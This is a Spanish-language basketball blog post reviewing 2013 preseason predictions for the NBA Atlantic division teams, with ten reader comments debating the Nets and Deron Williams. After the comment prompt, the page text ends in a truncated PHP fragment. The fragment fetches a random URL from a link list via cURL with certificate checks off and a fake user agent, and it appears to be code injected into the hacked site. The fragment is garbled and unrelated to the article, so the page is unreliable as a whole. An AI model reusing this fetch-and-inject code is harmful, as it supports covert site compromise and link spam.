Revisando los pronósticos 2013: Atlantic

13 de February de 2013 por TheDeerHunter

NEW YORK KNICKS

Análisis
Pronóstico: Alrededor de 45 victorias, 4º o 5º del Este. Dependiendo de los cruces, primera o segunda ronda.
Probabilidad de acierto: Media-Baja
Calificación pronóstico: D+

A día de hoy los Knicks lideran la división Atlantic y le pelean a los Heat la cabeza del Este, con dos tercios de victorias (una progresión de casi 55 victorias) y buenos motivos para estar satisfechos de la campaña que están firmando.

Siempre pueden llegar playoffs y protagonizar una de esas decepciones tan típicas de la franquicia. En ese caso nuestro análisis preliminar quedaría maquillado pero no puede ocultar la evidencia del errado fondo crítico que le imprimimos. “El mayor despropósito del mundo” decíamos…

De lo poco salvable a nuestro favor podemos rescatar el ojo acerca del asunto Lin. Se confirma que acertaron no renovándolo, entre otros motivos porque Felton y Kidd han defendido su rol a un nivel excelente e incluso Prigioni ha ofrecido buenas actuaciones. De todo esto casi mejor ni recordar como veíamos el asunto en su día…

Tampoco es que fuéramos excesivamente entusiastas con los dos protagonistas del año en la Gran Manzana. Diría que es comprensible. Nunca hemos dudado del talento de Melo ni de J.R. Smith pero sí lo hemos hecho de sus actitudes. Ellos dieron en el pasado sobradas razones para desconfiar. Éste año, por suerte, están brillando en todos los aspectos.

Cabe recordar que han recuperado recientemente a dos hombres importantes como Iman Shumpert y Amar’e Stoudemire y afrontan el tramo decisivo del curso con optimismo con un gran nivel de juego. El verdadero examen vendrá en postemporada, pero mientras no se demuestre lo contrario están llamados a dar mucha guerra en los próximos meses. 

BROOKLYN NETS

Análisis
Pronóstico: Segundos del Este. Final de Conferencia.
Probabilidad de acierto: Media-Baja
Calificación pronóstico: C-

Apuesta audaz, casi temeraria. Subcampeones del Este, nada menos, y eso que no habían superado el tercio de victorias la anterior campaña, aunque ésta había sido mejor que las dos anteriores. La franquicia experimenta una remodelación a todos los niveles, desde los mismos cimientos.

Los proyectos deportivos suelen requerir cierto tiempo para madurar. Si atendemos al comportamiento del flamante nuevo equipo de Brooklyn podemos apreciar algo de esto. La crisis de resultados de diciembre no puede explicarse únicamente por el trabajo de Avery Johnson o por la ausencia de Lopez. Tampoco es muy normal el sensacional arranque al inicio de la era Carlesimo. Simplemente es una inestabilidad bastante típica en estos casos.

En este punto me atrevería a decir que el objetivo realista no fue nunca jugar finales de buenas a primeras sino aterrizar bien, ilusionar a la nueva parroquia y captar fieles. Me parece que la campaña que están firmando es de notable alto, con muy pocos peros. Exceptuando el papel actual de Humphries y Brooks, la decepción personal de Teletovic y el despido, a quien le vaya a echar de menos, de “Mr. Bonobus”, todo ha salido entre bien y muy bien (de hecho más de uno incluirá esto último más entre las virtudes que entre los inconvenientes).

Con esto no quiero decir que no vea una base potente y equilibrada, capaz de plantar cara en las eliminatorias o que sea incapaz de alcanzar esa final que avanzamos. Improbable pero posible.

BOSTON CELTICS

Análisis
Pronóstico: Por encima de las 55 victorias. Finales de conferencia… mínimo.
Probabilidad de acierto: Baja
Calificación pronóstico: D+

Mucho finalista de conferencia, diréis, y es cierto. Quizá pecamos un poco de optimistas en esta división, pero es que a priori podíamos haber calificado sin problemas a la Atlantic como la división de la muerte en el Este. De hecho, con lo que ha llovido desde entonces aún podríamos calificarla como tal, con 4 de sus 5 equipos peleando por entrar en las eliminatorias.

Confieso que hubiera firmado lo que se dijo en su día. Una plantilla superior a la que el año pasado les hiciera sudar sangre a los campeones. “Orgullo, tradición y morir con las botas puestas” era su seña de identidad como apuntábamos. Es arriesgado apostar en su contra aunque parezcan condenados. Los recientes hechos parecen confirmar esa teoría.

Sin embargo la pérdida de Rondo se antoja casi definitiva e invalida cualquier análisis pasado. Sin él inevitablemente bajan un peldaño importante que en el Este bien puede marcar el límite de superar cualquier cruce. Para colmo también Sullinger es “out of season” en un equipo con graves problemas para aguantar el tipo bajo aros y recientemente se ha unido Barbosa a la lista de lesionados de larga duración.

El orgullo, la tradición y todo eso tendrá que servirles este año para aguantar la plaza de playoffs que conservan, que no va a ser nada fácil, o incluso para maquillar su plaza en la parte baja del cuadro. Eso si no mueven sus cartas vía traspaso y, en ese caso habría que ver si se moverían para agotar sus opciones inmediatas o, al contrario, para dar carpetazo definitivo al proyecto. De momento, las 55 victorias resultan imposibles… y parece complicado que puedan superar una hipotética primera ronda en caso de producirse.

PHILADELPHIA 76ERS

Análisis
Pronóstico: 42-47 victorias, 5º-7º de conferencia y primera ronda de playoffs.
Probabilidad de acierto: Media
Calificación pronóstico: C

No fuimos especialmente exigentes con los 76ers en nuestro análisis inicial. Parece claro que el objetivo del equipo era sentar bases para un futuro cercano en torno a sus jóvenes y al hasta ahora inédito, Andrew Bynum.

Como el susodicho tiene la “simpática” costumbre de cuidar sus maltrechas rodillas cargando conejitas y jugando a los bolos, los plazos se alargan y en consecuencia los resultados están por debajo de lo esperado. La buena noticia es que sus jóvenes compañeros, llamados a constituir junto a él la columna vertebral del futuro, están fogueándose de lo lindo sin exceso de presión. Turner, Thaddeus y, sobre todo, Holiday están carburando. Les debe preocupar mucho más convencer a Bynum para que renueve que clasificarse para los playoffs este año. La combinación de estos nombres empieza a sonar muy bien.

Con todo, tampoco están muy lejos del pronóstico que marcábamos en su día. La vuelta en las próximas fechas de su hombre grande puede empezarnos a dar una buena medida de lo que veremos allí en un futuro no muy lejano. No les iría mal adquirir experiencia en los cruces.

TORONTO RAPTORS

Análisis
Pronóstico: Alrededor de 35 victorias.
Probabilidad de acierto: Alta
Calificación pronóstico: A

Ni fú ni fa, que diría aquel. Parece que se da por cerrado un proyecto que ha terminado confirmándose horroroso (Calderón y Davis out, Bargnani en la pista de salida) pero queda la sensación de que tropiezan en la misma piedra, con una base costosa y de discutible eficiencia.

No es que seamos Nostradamus. Augurábamos movimientos y señalábamos candidatos. También pedíamos algún primera espada de nivel. Aún han tenido suerte con una cierta revalorización tanto de Calderon como de Davis, aunque no sabemos si se acierta con Rudy Gay, tan anotador como caro y que ha confirmado no ser el figura que creyeron ver en Memphis en la era post-Pau, al menos para convertirse en un equipo con opciones reales. Se podrá poner las botas que quiera en Canadá y el equipo mejorará un punto, pero no sabemos si los llegará a sacar de pobres.

Menos suerte han tenido con Bargnani que está teniendo aún menos suerte que la que acostumbra. Aún así hay toda la voluntad del mundo para que salga. Veremos qué es lo que pueden traer a cambio.

De los que había y que aún perduran destacan algunas luces (y no las que tiene él) de Amir Johnson y un buen tono del Lowry sano. También dn DeRozan correcto en general más algún destello de Terrence Ross. En el lado negativo está Landry Fields y que Valanciunas parece que no va a ser el nuevo Sabonis.

Más o menos bien para no enamorar a nadie pero también para no hacer ridículo constante y eterno. Veremos hacia donde se mueven.

Comenta

10 comentarios a esta entrada

  1. HisRoyalAirness dice:
    #1

    Entono el “mea culpa” por mi análisis de los Knicks. Bien es cierto que mantengo lo de los Playoffs pero me ha sorprendido gratamente la actitud y el buen hacer de Woodson, Melo, Kidd e incluso JR.
    De todos modos creo que no iba desencaminado ya que no me esperaba un rendimiento tan bajo de los Celtics y el análisis fue antes de la lesión de Bynum, contaba con que ambos equipos estuvieran por delante.

      Citar

  2. Jose Luis dice:
    #2

    Bueno, no todos esperábamos esto de los Knicks. De todas formas a los Sixers les hubiera puesto por debajo, aunque a los Celtics sí les hubiera puesto por encima. Además con más presión de estos equipos los Knicks podrían haber palmado alguno más.

      Citar

  3. Esteban dice:
    #3

    bueno llego la hora, yo hice el analisis de los NETS y paso a explicar el por que de mi pronostico y pretendo defenderlo

    los puse como finalistas en el este, si bien como veran en los comentarios del analisis de los KNICKS era muy optimista con sus posibilidades, tampoco esperaba llegar a TANTO, y con ROSE fuera en los BULLS no habia muchos candidatos para llegar a final de conferencia,
    de hacho al dia de hoy, nisiqueira pueden ser descartados
    a ver, hasta hace unas semanas los NETS estaban terceros, y al dia de hoy los distancian de ese lugar apneas un partido o dos entre bulls y pacers, por lo que existe la posibiolidad de que queden terceros e el este, y juegan una semifinal de ocinferencia con los NYK, alli todo puede pasar

    por otro lado, hay que reconocer que mas alla de los numeros que no son malos, no han dejado en nada buenas sensaciones y explicare en que me equivoque

    en primer y primerisimo lugar, el nivel de DERON WILLIAMS, sin duda lo ponia al nivel de CP3 antes de inicar la temporada y ahora ha bajado al 7 u 8 lugar siendo generosos entre los mejores bases de la liga, base todo el analisis en la capacidad de mejorar a sus compañeros que tenia, cosa que no fue asi y ahi empieza el probelma

    lo de jojo, es como dije, como segunda espada en un equipo que se pueda permitir su salario no esta mal, sucede que no acepta ser segunda espada y contentarse con tirar buenos tiros, sino que sigue y sigue forzando jugadas de uno contra uno que perjudican la dinamica ofensiva del equipo

    wallace ha tenido problemas fisicos todo el año

    LOPEZ, no es el jugador que yo conocia, ha sumado al menos 10 kilos a su cuerpo, por lo que ha ganado tamñana y fuerza que le permiten rebotear y defender algo mejor, pero a la vez ha perdido muchisima agilidad y velocidad, no estoy seguro que el cambio le sea favorable, pero sin dudas ha respondido, sera ALL-STAR ocmo vaticine

    los de humpries fue un error de every mandarlo al banco y carcomerle la cabeza y su confiazna, hasta el momento venia jugando dignamente, pero lo valupuearon y no se ha podido recuperar, una pena por que podia haber sido importante si le daban el tiempo necesario

    otra falla es la productividad de teletovic a quien consideraba un jugador sumamente util, aun lo considero, pero no lo hacen jugar, una pena, tiene e tiro y el fisico para ser un jugador de rotacion con las virtudes de bonner y novak, pero con muchas menos deificiencias, puede ademas defender y rebotear, una pena

    brooks es algo similar, lo venia como un valido revulsivo desde la banca, pero no le dan dado las posibilidades y cada error lo manda a la banca, otro que podria haber sido factor diferencial desde la banca pero no lo han aprovechado o el no ha respondido

    ambos podrian ser usados validamente como moneda de cambio, total aqui no tienen cabida y son jovenes y con potencial

    entre mis aciertos:

    la seguridiad de que clidress estaba acabado, nisiquiera termino la temporada
    el papel valido de cj watson como base suplente, una ganga por su contrato
    el papel rendidor como tirador a pie firme y buen defensor de bogans, otra ganga
    el rendimiento de super ganga de reggie evans, quien cumplio con mis expectetivas,
    la oportunidad que le otorgue a blatche de reivindicarse y no la ha desaprovechado en absoluto

    en fin, no ha estado tan lejos de la realidad, si deron hubiese jugado a nivel all-star, creo que estarian terceros pizandole los talones a sus vecinos

      Citar

  4. Denise dice:
    #4

    Es que en estos analisis hay muchos condicionantes.., lo de los Celtics no sé si el que hizo el analisis era fan verde pero era demasiado optimista, pero el de los Nets esta bien. Tu a principios de año ves el quinteto Deron-JoJo-Wallace-Humphries-Lopez mas un buen banquillo con CJ Watson-Brooks-Bogans-Blatche-Evans y joder, que tire la primera piedra quien pensara que este equipo no iba a hacer nada. Y ojo!! creo que algunos lo estais enterrando pronto, para mi siguen siendo favoritos para jugar la final del Este contra Miami.

      Citar

  5. Lucho dice:
    #5

    Esteban a principio de temporada veias a Deron al nivel de CP3?? En serio? Pero el año pasado afirmabas que cp3 es claramente el mejor base de la hitoria detras de Magic… Entonces Deron tmb lo era? Para mi es un cuarto que Cp3 claeamente

      Citar

  6. melo15 dice:
    #6

    Bueno Deron tuvo temporadas en el Jazz al nivel de CP3 o mejor, liderando al equipo, y el año pasado bajo sus porcentajes, pero eso era comprensible ya que jugaba en un equipo malo y tal.
    Pero lo de este año no se loi esperaba nadie.

      Citar

  7. Jose Luis dice:
    #7

    Deron está jugando lesionado toda la temporada… La próxima, si está sano, nos mostrará su nivel. De todas formas lee veo un pelín por debajo de CP3

      Citar

  8. HisRoyalAirness dice:
    #8

    Lo de CP3 el mejor base de la historia tras Magic es una broma verdad? Espero

      Citar

  9. Esteban dice:
    #9

    quiza no al nivel de CP3 pero si que era el segundo mejor base de la liga, detras de este

    este año ha bajado, rondo, westbrok, irving, holiday, paerker, hasta jennings han jugado mejor que el

    su flpoja temporada ha condicionado a los NETS, e igualmente estan ahi nomas del segndo puesto del este, mas de dos buenas victorias frente a grandes equipos como pacers y nuggets

      Citar

  10. Lucho dice:
    #10

    Para mi tmb es una boludez. Esteban decia eso supongo qe se acordara

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>